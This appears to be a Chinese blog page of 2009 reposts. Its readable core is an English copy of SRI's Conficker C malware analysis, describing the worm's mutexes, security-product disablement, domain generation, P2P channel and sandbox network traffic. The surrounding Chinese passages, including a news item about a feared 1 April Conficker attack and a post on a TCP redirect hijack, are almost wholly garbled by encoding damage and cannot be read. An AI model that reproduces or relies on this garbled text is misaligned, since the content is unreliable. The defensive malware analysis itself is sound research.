11.��Ů��Т˳�ġ��Т˳�Լ��ĸ�ĸ��ϰ��ף��Լ��ϸ�巢�ӵ��쾡�£��崺�硣

12.��Ů��ظ��顣��õ�Ů��ǲ��˺��Թ�ޣ��˵ǰ��ѵĻ��ѹ�ȥ��ʹ�໹��۵Ļ��䶼��Լ����һ�ֳɳ��һ��

13.��Ů��һ˿ͯȤ����Ƶ��۹�ȥ��ˡ��ǵ���ǲ��ģ��Ϊ��ǵ�Ŀ��ֻ��׷��Ϊ��ª��Ϯ��

14.��Ů��ϲ��滺��֣��ݰɣ��ҹ��İ��ۣ��ÿһ�ݰ��鵱��һ��İ��Ӫ��ÿһ�ε�Ͷ�붼�ǳ��׵ģ�ÿһ�ε��뿪��Ǹɴ�ġ��Ǽ��ᣬҲ�¸ҡ�

15.��Ů��м��ܡ��ֻ��ճ��ѣ��ú��ѷ��Լ��Ҹ��ϲ�ã��гɳ��ķ��ա�

16.��Ů��Ͼʱ��ܶ��顣��鼮�￪��Ұ��֪ʶ��ǡ��Ѱ��һ�ְ��ĳɳ��

----

ת��“http://hi.baidu.com/kingpheonix/blog/item/a674077b15d036fc0bd187a6.html”

�Ķ�ȫ��
���� 鿴��

Conficker C Analysis(ת��)

harite — 2009��03��26�� 07:00

�н��һƪ��Ԥ��м��˽ڿ�쭵Ķ��Ǹ�ɶ��

ת��“http://mtc.sri.com/Conficker/addendumC/”��ʡ��һЩ�½ڣ�ԭ��ǰٶ��־��ȵ��ơ�

SRI International Technical Report
Addendum Conficker C Analysis Phillip Porras, Hassen Saidi, and Vinod Yegneswaran http://mtc.sri.com/Conficker Release Date: 08 March 2009 Last Update: 19 March 2009
Computer Science Laboratory SRI International 333 Ravenswood Avenue Menlo Park CA 94025 USA

-- NOTICES --

This draft document represents an analysis in progress and is subject to

continual enhancement, error correction, and improvement

Introduction

This addendum provides an evolving snapshot of our understanding of the latest Conficker variant, referred to as Conficker C. The variant was brought to the attention of the Conficker Working Group when one member reported that a compromised Conficker B honeypot was updated with a new dynamically linked library (DLL). Although a network trace for this infection is not available, we suspect that this DLL may have propagated via Conficker's Internet rendezvous point mechanism (Global Network Impact). The infection was found on the morning of Friday, 6 March 2009 (PST), and it was later reported that other working group members had received other DLL reinfections throughout the same day. Since that point, multiple members have reported upgrades of previously infected machines to this latest variant via HTTP-based Internet rendezvous points. We believe this latest outbreak of Conficker variant C began first spreading at roughly 6 p.m. PST, 4 March 2009 (5 March UTC).

In this addendum report, we summarize the inner workings and practical implications of this latest malicious software application produced by the Conficker developers. In addition to the dual layers of packing and encryption used to protect A and B from reverse engineering, this latest variant also cloaks its newest code segments, along with its latest functionality, under a significant layer of code obfuscation to further hinder binary analysis. Nevertheless, with a careful mixture of static and dynamic analysis, we attempt here to summarize the internal logic of Conficker C.

Implications of Variant C

Variant C represents the third major revision of the Conficker malware family, which first appeared on the Internet on 20 November 2008.   C distinguishes itself as a significant revision to Conficker B. In fact, we estimate that C leaves as little as 15% of the original B code base untouched, as illustrated in Appendix 3, A Comparative Assessment of Conficker B and C Process Images.    Whereas the recently reported B++ variant represented a more surgical derivative of B, C incorporates a major restructuring of B's previous thread architecture and program logic, including major functional additions such as a new peer-to-peer (P2P) coordination channel, and a revision of the domain generation algorithm (DGA). It is clear that the Conficker authors are well informed and are tracking efforts to eliminate the previous Conficker epidemics at the host and Internet governance level. In Conficker C, they have now responded with many of their own countermeasures to thwart these latest defenses.

For example, C's latest revision of Conficker's now well-known Internet rendezvous logic may represent a direct retort to the action of the Conficker Cabal, which recently blocked all domain registrations associated with the A and B strains.   C now selects its rendezvous points from a pool of over 50,000 randomly generated domain name candidates each day.   C further increases Conficker's top-level domain (TLD) spread from five TLDs in Conficker A, to eight TLDs in B, to 110 TLDs that must now be involved in coordination efforts to track and block C's potential DNS queries.    With this latest escalation in domain space manipulation, C not only represents a significant challenge to those hoping to track its census, but highlights some weaknesses in the long-term viability of how Internet address and name space governance is conducted.

One interesting and minimally explored aspect of Conficker is its early and sophisticated adoption of binary encryption, digital signatures, and advanced hash algorithms to prevent third-party hijacking of the infected population.   At its core, the main purpose of Conficker is to provide the authors with a secure binary updating service that effectively allows them instant control of millions of PCs worldwide.   Through the use of these binary encryption methods, Conficker's authors have taken care to ensure that other groups cannot upload arbitrary binaries to their infected drone population, and these protections cover all Conficker updating services: Internet rendezvous point downloads, buffer overflow re-exploitation, and the latest P2P control protocol.

In evaluating this mechanism, we find that the Conficker authors have devised a sophisticated encryption protocol that is generally robust to direct attack. All three crypto-systems employed by Conficker's authors (RC4, RSA, and MD-6) also have one underlying commonality. They were all produced by Dr. Ron Rivest of MIT. Furthermore, the use of MD-6 is a particularly unusual algorithm selection, as it represents the latest encryption hash algorithm produced to date. The discovery of MD-6 in Conficker B is indeed highly unusual given Conficker's own development time line. We date the creation of Conficker A to have occurred in October 2008, roughly the same time frame that MD-6 had been publicly released by Dr. Rivest (see http://groups.csail.mit.edu/cis/md6). While A employed SHA-1, we can now confirm that MD-6 had been integrated into Conficker B by late December 2008 (i.e., the authors chose to incorporate a hash algorithm that had literally been made publicly available only a few weeks earlier).

Unfortunately for the Conficker authors, by mid-January, Dr. Rivest’s group submitted a revised version of the MD-6 algorithm, as a buffer overflow had been discovered in its implementation.   This revision was inserted quietly, followed later by a more visible public announcement of the buffer overflow on 19 February 2009, with the release of the Fortify report (http://blog.fortify.com/repo/Fortify-SHA-3-Report.pdf). We confirmed that this buffer overflow was present in the Conficker B implementations. However, we also confirmed that this buffer overflow was not exploitable as a means to take control of Conficker hosts.    Nevertheless, the Conficker developers were obviously aware of these developments, as they have now repaired their MD-6 implementation in Conficker C, using the identical fix made by Dr. Rivest's group. Clearly the authors are aware of, and adept at understanding and incorporating, the latest cryptographic advances, and are actively monitoring the latest developments in this community.

One major implication from the Conficker B and C variants, as well as other now recently emerging malware families, is the sophistication with which they are able to terminate, disable, reconfigure, or blackhole native operating system (OS) and third-party security services. We provide an in-depth analysis of Conficker's Security Product Disablement logic, to help illustrate the comprehensive challenge that modern malware poses to security products, and to Microsoft's anti-malware efforts.   Conficker offers a nice illustration of the degree to which security vendors are being actively challenged to not just hunt for malicious logic, but to defend their own availability, integrity, and the network connectivity vital to providing them a continual flow of the latest malware threat intelligence.

Perhaps the most obvious frightening aspect of Conficker C is its clear potential to do harm.   Among the long history of malware epidemics, very few can claim sustained worldwide infiltration of multiple millions of infected drones. Perhaps in the best case, Conficker may be used as a sustained and profitable platform for massive Internet fraud and theft. In the worst case, Conficker could be turned into a powerful offensive weapon for performing concerted information warfare attacks that could disrupt not just countries, but the Internet itself.

Finally, we must also acknowledge the multiple skill sets that are revealed within the evolving design and implementation of Conficker. Those responsible for this outbreak have demonstrated Internet-wide programming skills, advanced cryptographic skills, custom dual-layer code packing and code obfuscation skills, and in-depth knowledge of Windows internals and security products. They are among the first to introduce the Internet rendezvous point scheme, and have now integrated a sophisticated P2P protocol that does not require an embedded peer list. They have continually seeded the Internet with new MD5 variants, and have adapted their code base to address the latest attempts to thwart Conficker.   They have infiltrated government sites, military networks, home PCs, critical infrastructure, small networks, and universities, around the world. Perhaps an even greater threat than what they have done so far, is what they have learned and what they will build next.

Conficker C Overview

Figure 1 illustrates the Conficker C program structure and logic.   When initialized, the DLL performs its setup logic, similar to that of A and B, with extensions.   At initialization, it checks for the presence of three mutex values on the target host to avoid reinfection. If absent, these three mutexes are created: 1) the mutex name "Global\-7"; 2) the mutex name "Global\-99; and 3) a mutex named pseudo-randomly generated based on the process ID. The in the first two mutex is unique per computer name; it is calculated based on the crc32 hash of the computer name and XOR'ed with a constant. C then installs several in-memory patches to DLLs, and embeds other mechanisms to thwart security applications that would otherwise detect its presence.

C modifies the host domain name service (DNS) APIs to block various security-related network connections (Domain Lookup Prevention), and installs a pseudo-patch to repair the 445/TCP vulnerability, while maintaining a backdoor for reinfection (Local Host Patch Logic). This pseudo patch protects the host from buffer overflows by sources other than those performed by the Conficker authors or their infected peers.

Like Conficker B, C incorporates logic to defend itself from security products that would otherwise attempt to detect and remove it.     C spawns a security product disablement thread. This thread disables critical host security services, such as Windows defender, as well as Windows services that deliver security patches and software updates. These changes effectively prevent the victim host from receiving automated software updates. The thread disables security update notifications and deactivates safeboot mode as a future reboot option. This first thread then spawns a new security process termination thread, which continually monitors for and kills processes whose names match a blacklisted set of 23 security products, hot fixes, and security diagnosis tools.

Figure 1: Overview of Conficker C

Conficker C installs itself into the user file system and configures the registry appropriately to invoke its DLL at host startup. It also inserts a variety of extraneous registry keys that are subsequently unused, presumably to cloak its presence (Obfuscating C's Installation and Its Presence). It copies itself into a randomly named DLL located in either the System32 directory, program files directory, or the user's temporary files folder. It deletes all restore points prior to its infection to thwart rollback. C then performs a simple validation of its DLL size, and suicides if this check fails. It sets the DLL's date to the same date as the local kernel32.dll, and sets NT File System (NTFS) file permissions on its stored file image to prevent write and delete privileges. Once installed, the DLL spawns a remote thread, which it attaches to the netsvcs.exe or svchost.exe process, depending on the OS version.

The core elements of Conficker C are incorporated into two threads: a P2P communication thread, and the domain generation and Internet rendezvous point thread. The first thread is embodied in a code segment that has undergone an additional layer of code obfuscation, suggesting a desire by the Conficker authors to hinder its analysis, and thereby providing an obvious point for in depth inspection. We describe the P2P protocol in Peer to Peer Logic. The P2P protocol includes an ability to coordinate with peers over TCP and UDP channels, as well as download and run digitally signed Win32 binaries. Incorporated with the P2P thread is anti-tracing logic that will kill the Conficker C process when run under a debugger. This logic was removed for this analysis. Conficker C also incorporates an HTTP date check function, which is discussed within Peer to Peer Logic.

Finally, C introduces a substantial modification of the DGA and query procedure, discussed in Domain Generation Algorithm. The DGA will be activated on 1 April 2009, and before April 1st it will enter a loop that sleeps 24 hours and then rechecks the date via getlocaltime. Prior to entering the April 1st date check, C will sleep for an initial random interval between 30 and 90 minutes. More specifically, this sleep interval is between 30 and 90 minutes if the local hour is after 11 a.m. and before 7 a.m. If the local time is after 8 a.m. and before 11 a.m., the sleep period will be between 2.5 and 3.5 hours. It will then check for Internet connectivity, and if connected will enter the domain generation logic. The next section describes this logic in greater detail.

ʡ��

In-Situ Analysis - Sandbox Operations

We used dynamic sandbox monitoring techniques to evaluate the interactions of Conficker C when operating live on the Internet. The release used for this analysis was monitored and filtered such that it would not cause harm to other external hosts while these experiments were being conducted.

We describe the network profile of a Conficker C infected host during a 30-minute sandbox execution. Since our current experiments were conducted in early March 2009, we did not see the HTTP rendezvous point lookups. We expect this activity profile to change on 1 April. During our pre 1 April sandbox run, we observed the following network effects, which are illustrated in Figure 9.

DNS queries at a rate of 10 to 25 per 5-minute interval were observed. We also observed web server queries, which included connections to 4shared.com, adobe.com, allegro.pl, ameblo.jp, answers.com, aweber.com, badongo.com, baidu.com. bbc.co.uk, blogfa.com, clicksor.com, comcast.net, cricinfo.com, disney.go.com, ebay.co.uk, facebook.com, fastclick.com, friendster.com, imdb.com, megaporn.com, megaupload.com, miniclip.com, mininova.org, ning.com, photobucket.com, rapidshare.com, reference.com, seznam.cz, soso.com, studiverzeichnis.com, tianya.cn, torrentz.com, tribalfusion.com, tube8.com, tuenti.com, typepad.com, ucoz.ru, veoh.com, vkontakte.ru,wikimedia.org, wordpress.com, xnxx.com, yahoo.com, and youtube.com.

P2P queries were sent to random hosts on high-order ports. This is steady at a rate of 50 to 60 hosts per 5 minutes in TCP and a rate of 240 to 2500 hosts per 5 minutes in UDP. The failed TCP and UDP attempts also result in a high rate of inbound ICMP backscatter.

There are also six HTTP connections that were all successfully established in the first 5 minutes to tuenti.com, tianya.cn, miniclip.com, blogfa.com, answers.com and rapidshare.com. In each case, the GET request was to the top directory (GET / HTTP/1.1). Responses are gzip-encoded HTML content.

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/x-ms-xbap, */*
Accept-Language: en-GB
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: rapidshare.com
Connection: Keep-Alive

Figure 9: Pre 1 April 2009 short-term network traffic profile

Figure 10: Post 1 April 2009 6-hour network traffic profile

We also created a new (mutated) version of the binary that executes the post 1 April 2009 logic. The graph in Figure 10 summarizies a long-running (6-hour) network trace of this binary. This figure captures the volumes of observed outbound communication attempts over the multihour run: HTTP, DNS, TCP P2P and UDP P2P, activity. The DNS activity includes two components: attempts to contact the 500 rendezvous points, and attempts to contact Internet portals for finding the date. The trace from this live experimental run corroborates our static analysis results: each C host contacts 500 rendezvous points each day over 116 TLDs with a flat entropy (random domain name space). We see a dropoff in overall levels of DNS activity after hour 3 when it has looked up the IP addresses of all 500 domains. In our case, all these were failed (NXDOMAIN) attempts, as these domains have not yet been registered.

The UDP and TCP P2P activity also drops off in the first 2-hours before settling on a steady scanning rate. The HTTP date check activity remains a relatively steady six to nine hosts contacted per hour. The key implication from the in-situ analysis is that it should be fairly easy to fingerprint Conficker C based upon its unique TCP and UDP scanning patterns. We should also be able to identify C hosts (starting 1 April 2009) based on the volume of NXDOMAIN responses these hosts would receive for failed DNS lookups.

Conclusion

We present an analysis of Conficker Variant C, which emerged on the Internet at roughly 6 p.m. (PST) on 4 March 2009. This variant incorporates significant new functionality, including a new domain generation algorithm and a new peer-to-peer file sharing service. Absent from our discussion has been any reference to the well-known attack propagation vectors (RCP buffer overflow, USB, and NetBios Scans) that have allowed C's predecessors to saturate so much of the Internet. Although not present in C, these attack propagation services are but one peer upload away from any C infected host, and may appear at any time. C is, in fact, a robust and secure distribution utility for distributing malicious content and binaries to millions of computers across the Internet. This utility incorporates a potent arsenal of methods to defend itself from security products, updates, and diagnosis tools. It further demonstrates the rapid development pace at which Conficker's authors are maintaining their current foothold on a large number of Internet-connected hosts. Further, if organized into a coordinated offensive weapon, this multimillion-node botnet poses a serious and dire threat to the Internet.

Our report represents one of many Conficker analysis studies going on throughout the whitehat community, and we are in direct contact with numerous groups that will produce additional details, and will help clarify errors that exist in this report. This report is a living document, and we will update it regularly, as our understanding of variant C continues to grow.

Acknowledgments

We would like to thank Drew Dean from SRI's Computer Science Laboratory for his assistance in understanding the binary validation routine. We would like to thank Bruce Dang from Microsoft for his assistance in understanding the mutex key generation. We would like to thank Arvind Narayanan from the University of Texas at Austin for his collaboration in the developing the Horizontal Malware Analysis tool shown in Appendix 2.

References

[4] P.A. Porras, H. Saidi, and V. Yegneswaran. "A Multiperspective Analysis of the Storm Worm. SRI Technical Report, 2007. http://www.cyber-ta.org/pubs/StormWorm/

[12] Eric Chien, "Downadup: Peer-to-Peer Payload Distribution," 2009.
http://myitforum.com/cs2/blogs/cmosby/archive/2009/01/22/downadup-peer-to-peer-payload- distribution-symantec-security-response-blog.aspx

[15] Jose Nazario, "The Conficker Cabal Announced," Arbor Networks, 12 February 2009.
http://asert.arbornetworks.com/2009/02/the-conficker-cabal-announced/

[16] SRI International, "A Comparative Assessment of Conficker B++ vs Conficker C," 06 March 2008.
http:/mtc.sri.com/Conficker/addendumC/HMA_Compare_ConfB2_ConfC/

[17] CAIDA, "Conficker/Conflicker/Downadup as seen from the UCSD Network Telescope," February 2009.
http://www.caida.org/research/security/ms08-067/conficker.xml

Appendices

Appendix 1 Embedded Strings Within Conficker C

We have extracted and categorized the set of strings that are embedded in the Conficker C binary. The full set of embedded Conficker C strings is listed HERE.

Appendix 2 Domain Generator Filtered Address Ranges

We have isolated the full set of IP address ranges that are used to prefilter all IP addresses produced by the Conficker C domain generation algorithm. This blocklist is shown HERE.

Appendix 3 A Comparative Assessment of Conficker B and C Process Images

This is a comparative assessment of the Conficker B++ vs. Conficker C disassembled process images. The complete comparative assessment of B++ vs C is available HERE.

Appendix 4 Sandbox Results from Running Conficker C

This appendix shows a forensic analysis of the Conficker C binary as captured through dynamic network analysis and sandbox testing. See the full list of forensic results HERE.

Appendix 5 API Recovery Table

This appendix maps the set of obfuscated APIs to their code offsets. The map is useful for a reverse engineering analyst to understand the P2P protocol logic. See the API list HERE.

�Ķ�ȫ��
����ȫ�� 鿴��

��˽ںڿͿ��ܷ��ʷ��ǿ��繥��(ת��)

harite — 2009��03��26�� 01:31

ת��“http://www.cert.org.cn/articles/news/common/2009032624260.shtml”

��˽ںڿͿ��ܷ��ʷ��ǿ��繥��

    ��ĬĬ��Ⱦȫ��糬��1500��̨��֮�󣬱�΢��о��ԱϷ��Ϊ“��ģ��”��Conficker��没��¶��Ŀ��3��25�գ��簲ȫ��360��ȫ��ķ��Ԥ��ƣ�Conficker��没��ߺܿ��4��1��𷢶�һ��ʷ��ǰ��ȫ��繥��ʱ��ٶȡ��˹�ᡢIBM��ڵ��ϰټ�ȫ��վ��п��ٷ��̱��û��޷��ʵľ޴��ա��ͬһʱ�䣬��֪��ȫ��Ⱥ�𳽡��ƿƼ�Ҳ��Ըò��˽�Ԥ��Ϣ��

    ��Conficker��“��˽��Ծ�” ��÷��ս��ͣ��

    360��ȫר��ʯ��粩ʿ��ʾ��360��ȫ��Ľػ��Conficker��没��ֵ��ò��߼��п��ܴ�4��1��𣬿��Ⱦ��ǧ��̨“��ʬ”��ԣ��Զ��ȫ��ϰټҴ��վ��ݣ��ʽ��DDOS��Ŀ��Ҫ��ȫ��ǰ�Ĵ��ͻ��վ��ҵվ�㣬�ٶȡ��Ѷ��ѡ��У��4�ҵȹ��ߵ��վҲ��Ȼ��С�

    “Conficker.C��Ⱦ�ĵ��н��ߵ��ѭ��һ��ϵͳʱ�䵽2009��4��1��֮��ͻ��ѹ��һϵ�и��ϰټ�Ԥ��ָ��վ��ݰ��Conficker.C��ȫ��ǧ��̨��Եĸ�Ⱦ��жϣ��ɵĽ�ʬ��ڻ��ں��κ�һ��վ�ķ��ǿ�ȵĹ��ѹ��¶��Ѹ��̱��Щ��Ŀ��ܿ��Conficker��Alexa��ѡȡ�ĸ��վ�㡣”360��ȫ��ĵĹ��ʦ��ơ�

    ��˽⣬Conficker��ȥ��11��״��ڻ��У��Windows��ϵͳMS08-067©��Լ�ֲ��δ�򲹶��ĵ��ԣ��Ծ��U�̵ȶ��ַ�ʽ��һλ��ʿ��ڼ�ʹ��U��Conficker��󷨹��Ⱦ��ٴ�У��ж��Web��ϵͳ��ս��ɼƻ�Ҳ��ͻȻ��ͣ��Ӣ��¹��ľ��ϵͳҲ��ȾConficker��Ϣ��䴫��Ӱ��ɼ�һ�ߡ�

    ��ǣ��ڷ��Ⱦȫ��֮�࣬Conficker��Ϊȴ��“��ؼ�”��ӱ��“��һ��Ϊ��——��ʱ60�롢��ӵ��硢��͸��ԭ��˽�֪��ͼ��——ֻ��Σ��ʧ�ܵ��û��ϵͳ��¼ʧ�ܵİ��Ҳ��ټ��”΢��й��˾��ȫ�о��Ա“��ţ��”��˲��д��“��ȫ��‘ģ��’��”

    �ѵ��躹��4��º�Conficker��ߵ��Ŀ��Ϊ��˽ڷ��һ�δ��ģ��繥��Դˣ�360��ȫ��Ĺ��ʦ�ƣ�“ҵ��Ŀǰ��Conficker�Ĳ²��˵��硣��Ӵ��Ⱦ��̺��ȡ�޶�Ƹ��ֱ��練�ƣ��ȫ��û��̱��2002��кڿ��ð��򼶵��湥��λ��DNS��ʹ�ȸ衢΢��IBM��վ̱��ѿ��ǧ��̨��Ե�Conficker��Ŀǰֻ�Ǵ��Լ��Ļ��ֳٳ�û�ж��˲²�͸�ڿ͵ĺ�«�﾿��ʲôҩ��Ŀǰ��ֻ��ȡ��Conficker.C��ִ�4��1�տ�ʼ��ͼ�ǳ��ȷ��Ҳ��ų��߸�ȫ��簲ȫ�о��Ա��һ�γ��˽��Ц��”

    ��Ѿ��Conficker��Ĳ��360��ȫ��ĵĹ��ʦͬʱҲ��ϣ�Ŀǰ��Ѷ�λ��ߣ�“Conficker��û�н�һ��ǽ��׷�ٵ��ʵ��ݣ��һ��Բ��롣”360��ȫ��ʦ�ƣ�“��겻��ӽ��500ֻ‘�⼦’��ԣ��ù��һ�Ҵ��ͻ��վ��UT��̱��500��ӣ�Conficker��й��C��ֵĸ�Ⱦ��ǧ��̨�Ĺ�ģ��”

    Conficker��Ϊ�й��ڿ� ��΢��25��ͼ��

    Conficker��ʱ��ȫ��Կֻ��˽ڵ��ٽ��𽥼Ӿ硣��˳Ծ��ǣ��ľ��ֺ��Ĺ��ȴ��Conficker��Ⱦ�ı��档��360��ȫ��ĵ��ݳƣ�Ŀǰȷ��ȾConficker��ֵĹ��û��Խ��ҵ��ȿ��˵��΢��Conficker��ǡǡ�ܿ��ȴ��й��ڿͣ�

    360��ȫ��ĵĹ��ʦ��ʾ��“Conficker��̳��ֹ�A��B��C��֣��ǲɼ��Conficker�ķ��˴��ľ��ֹ��ģ��ʹ��˽��ڹ��ڼ��Ա��ľ��룬��߼��п��ǹ��ںڿ͡�”

    “Conficker��MS08-067©��©��ϸ��类��ڹ��ڼ��̳��Ҳ��ɹ��ڵ�ɨ��ʵ��”��·��̳�У��ͬ��Conficker��Ϊ��ʱ��߳�û����˽⣬��2004��“�𵴲�”��⵽΢��25��ͨ��֤��һ��¹��ڿ͡��һ�Σ��ľ��Ĺ��ںڿ��Ǻܿ��ؽ��Ͷ�վ�ڷ��˼⡣��΢��˾Ϊ��Conficker��ߣ��ٴο��뼩��“�𵴲�”��ͬ��׼��25��Ԫ�߶��ͽ�

    Conficker��Ϊ��ںڿ��Ϊ��ڹ��ڷ��ն��黹��飬΢��й��ȫ�о��Ա“��ţ��”��˲��˷��“360��û�Ⱥ�㷺�Ĺ��ȫ��ͨ��Ŀ�ķ�ʽ��ѣ��ṩ��ʺ��û��ϵͳ��·�ʽ��ܴ�̶��ϰ��Windowsʹ��߼�ʱ��װ�˲��ʾ��л��й�ISP�ȹ��ٵö࣬��ڹǸ�·�ɺ��Ҫ�ڵ��ù��TCP:139/445�ķ��ʲ��ԣ��й��Ѳ��Conficker��´��”

    �ݷ��һЩ�ڿ��̳��е�“ľ��”ҲΪConficker��ǹ��ںڿ��ṩ��֤��“��Ǳ�BBS”��һ��͸¶��“��а�ȫ��Խ��Խ�ռ��Ҷ��ʶ��򲹶��Ҫ�ԣ�‘�⼦’��ǰ�Ѿ��ץ��ˡ��ڹ��ľ��׬ǮԽ��Խ�ѣ��ܶ��д��ľ��ȴ��ֻ�ÿ��Ӣ��ת��⡣”��Ϸ��“��ץ�ڿͣ��Ӣ��ѵ��һץһ��׼��”��

    ��˽⣬΢��IE XML 0day (MS08-078) ©��类��֣��̶��ۡ��á��ڹ��ڻ��ϣ��󷴶��ҵĶ��վ��ԶԶ��й��ɺϵ��ǣ��һ��Adobe Acrobat Read�ڽ��0day©��ʱ��ڹ��Ż��Ghostľ��ǹ��“�⼦”��Ƶĳ��ù��ߣ��ܿ��Ҳ�ǳ��Թ��ľ��ߵ��ֱʣ��ɴ��ƶϣ�Conficker��ǹ��ںڿ;��췽ҹ̷��ĳ��ںڿ͵Ĺ��——“�ò��й��”��

    360��ȫר��ʯ��粩ʿ֣�ؽ��飬��Conficker��ܷ��Ĺ��ڻ��ҵӦ��“Conficker��ڹ��ڴ��360��˲��˵��ʵ��̫��в��Щ��ܳ�ΪConficker��Ŀ��Ĵ��վ��һ��Ҫ��4��1��ǰ��һ�η��ѹ��ԣ��Է��һ��⣬��ҵ��ľ��Conficker��״��ĳ��һ̨��‘��’�ͻᵼ��ִ��Ⱦ��ҵԱ��360��Ϊ��޸�©��⣬��û��ʹ��U��ǰӦ��360�Ⱦ��U�̷��ǽ��ܵİ�ȫ��”

�ؼ��:Conficker��没��

�Ķ�ȫ��
����ȫ�� 鿴��

��Ҏģ�W퓽��Dַ��{δ��Ҷ��e�ˣ�ת�أ�

harite — 2009��03��13�� 08:15

ת��“http://armorize-cht.blogspot.com/2009/03/blog-post.html”

��m��Ҋ��Ҏģ�W퓽��Dַ֮ˮ��ʯ��ƪ��
��

��³��_ʼ��W·��m��Ϣ��B��tw.msn.com��taiwan.cnet.com�ȾWվ�r��Ԅ��Dַ��www.dachengkeji.com��һ�_ʼ��e�룬��l��DNS�]��patch�ɣ�Ҫ��Ȼ��DNS 0-day��BGP�ˡ��^�ˎ��죬��{߀�Ǜ]�н��ý�wҲ��ˣ�

��ؾW��Dַ�¼� �ɞ��͑B��ַ��ZDNet 2009/03/05
DNS�⹥�ݣ��֪��Wվ�K��r��Dַ��W·�YӍ 2009/03/05
[�̌W]��W·�ٳ�ԓ��Ծȣ��W·�YӍ 2009/03/07
׷ۙ��Dַ��Գ��m�Ґ��a�ַ��څ��죬�W·�YӍ 2009/03/08
΢ܛMSN��Dַ��ό�DNS��֣�IThome 2009/03/06

��@�N��Č��Ҷ��f��DNS��ˣ��ҵ�ֱ�Xһ��...��Ǖr�@�N�롣

��磬��һ̨��X�ϾW��@̨��IE��퓛]�иģ��O��MSN��Y��һ�_��ı��ܵ�dachengkeji�ˡ��@��dachengkeji.com��ǅ��e�룬�^��@�N��죬��{��߀�]��@��r��o0o.nu��fyodor yarochkin��j��ʽ��fygrave �� o0o �c nu��MSN�ς�ӍϢ��f��̖�Q��DNS��ܡ��ɾW��Dַ��¼��DNS�o�P��ҵĺ��棬��WireShark��һ�·��Ȼ�l�F�@�^��һ��DNS��ܣ��е��ַ�Ϭ��Ӱ푵Ĺ��ԓ�ǳ��@߅��fyodor�c�ҵ��о��c��λ��ϣ��λ��뷨��Ҳ��׌�҂�֪��

�@һ��˃ɂ��ɣ�

(1) None-blind spoofing��@Ҳ��ʾ��ʽλ춏��ܺ��ߵ��ܺ��Wվ֮�g��·��ϣ��ԱO ��

(2) ��Щ TCP/IP stack �ڌ��ϵ�ȱʧ��bug��Ŀǰ�yԇ�Y��΢ܛ��ϵ�y�д�ȱʧ��AӋ߀��Iϵ�y��д�ȱʧ��

��ҽ�WireShark��ķ��@��ַ��r��ԇ�D�B��http://www.gogrok.com��W��f�@��WվҲ��i��Dַ��Ү��r��IP��192.168.1.129��gogrok��202.157.128.202��
��҂��frame 15--�ҵęC��gorok��SYN��

Frame 16�У��SYN/ACK��ע�⌦��TTL��56��

Frame 17��ACK��three way handshake��ɣ��B��ɹ��Frame 18��http request��request��get��؄e�L��Զ��һ��e��ע��TCP s/n=752��

Frame 19��ؑ��s/n�ǌ��ģ�752��id=0x0100��̫��˰ɣ�TTLҲͻȻ׃��=115��c��@��O��FIN��http response��--meta refresh�D��FIN��ʾ��Ҫ�Д��B��meta refresh�t��ҵĞg�[��D��www.zhonglie.org��@��@��䌍�]�з��RFC 793��SYN/FIN��܎��payload��е�payload��ԓ��three way handshake�꣬FIN֮ǰ��Q��

Frame 20-21��ҷ��_��Д��B��Frame 23��ƾWվ�́��ACK��s/n�ǌ��ģ�752��TTLҲ��56��id=0x2087��0x0100��Ǳ��^��ҙC��ѽ��J��B��Д��ˣ��g�[��Ҳ��D��ˡ�

�@��ɫ�ǣ��һ��_��s/n̖�a��ʾ��ʽλ�route�ϣ��Կ��ڶ��Щ��Iϵ�y��΢ܛ��TCP/IP stack��ϵ�ȱʧ��ʹ��һ��͸㶨��Ǭ�Q��䡣

�ܶ�W�Ѷ��ھW·��ӑՓ��
��Btw.msn.com�ͱ��http://www.dachengkeji.com/article/index.htm��
��BMSN��퓕��Dַ��www.dachengkeji.com/article/index.htm��
��M�� iThome Blog�Wַ�Ԅ��D�V��Wַ��
��[��] �Btw.msn.com�ͱ��http://www.dachengkeji.com/article/index.htm ��
��k��z�鱾վ�Ƿ� DNS �б��᣿��˾W��i��c�xҪС�ģ��
��tw.msn.com��ˆ᣿��
��y�Dַ��
��i��˵�"www.dachengkeji.com"��˿Ƽ��
��Wվ�� : �P�tw.msn.com��dachengkeji�Wվ�ķ��ѽ��ӵ��҂��͑��ˡ�
��[��Ҫ]�BMSN��퓕��Dַ��www.dachengkeji.com/article/index.htm��
��[��] ̨��ٷ��վ�ǲ��Ǳ��ˣ��ͼ˵��
��X��:��ж��ľW��Ԅ��Dַ(3/10��)��
��Btw.msn.com�ͱ��http://www.dachengkeji.com/article/index.htm��
�W퓽ٳ�

�@ЩӑՓ�c�󌧣��L��f�ģ��_��@�εĹ��DNS�]��κ��P�S����⣬Ŀǰ��ֹ��{�K�]�нY��򽵵ͣ���Ճ��c��c��Ǖr��X��Щ�yԇ��l�Fÿһ��Btw.msn.com��D�򡣵��s��c�_ʼ��ͻȻ��D��ˣ��{��ˣ��Ⱦ��·��޺��ˡ��°��磬�Ұl�F��{��Ȼ��ڣ��ǌ��ÿһ��i��D��ľWַ��ֻ�Dһ�Σ�Ҳ��f��O��ڼ��e��Nֻ��һ��B��i��֮�Wվ�r��Dַ��ڶ��ξ��ȫ��ˡ��@�Ǟ��䛵��gogrok.com��tw.msn.com��D��һ��Ͳ��D�ˡ��ԇ�˺ܶ౻�i��ľWַ��һ�ӣ�ֻ�е�һ�Ε��D��

�W·��Д��^�ӽ��҂��ģ��Blue��Y��֮��N��P��@��Dַ��¼��߀��richliu��blog��ĳЩ ISP ��Ʊ� hijacking��⣬��mobile01�ϣ�powerpcer��N��pcap dump��҂��^�ַ��҂�䛵��һ�ӵġ�

CiscoҲ��̖�N��alert:
CISCO:TCP Traffic on Chinese Networks Redirected to Malicious Websites

�҂��@߅��¼��P�Y�ϣ��оW��п��a��ģ��gӭ��Ի�email��wayne��armorize�ccom��ṩ�҂��

[��]
(1) None-blind spoofing��@Ҳ��ʾ��ʽλ춏��ܺ��ߵ��ܺ��Wվ֮�g��·��ϣ��ԱO ��
(2) ��Щ TCP/IP stack �ڌ��ϵ�ȱʧ��bug��Ŀǰ�yԇ�Y��΢ܛ��ϵ�y�д�ȱʧ��AӋ߀��Iϵ�y��д�ȱʧ��

[��ɫ]
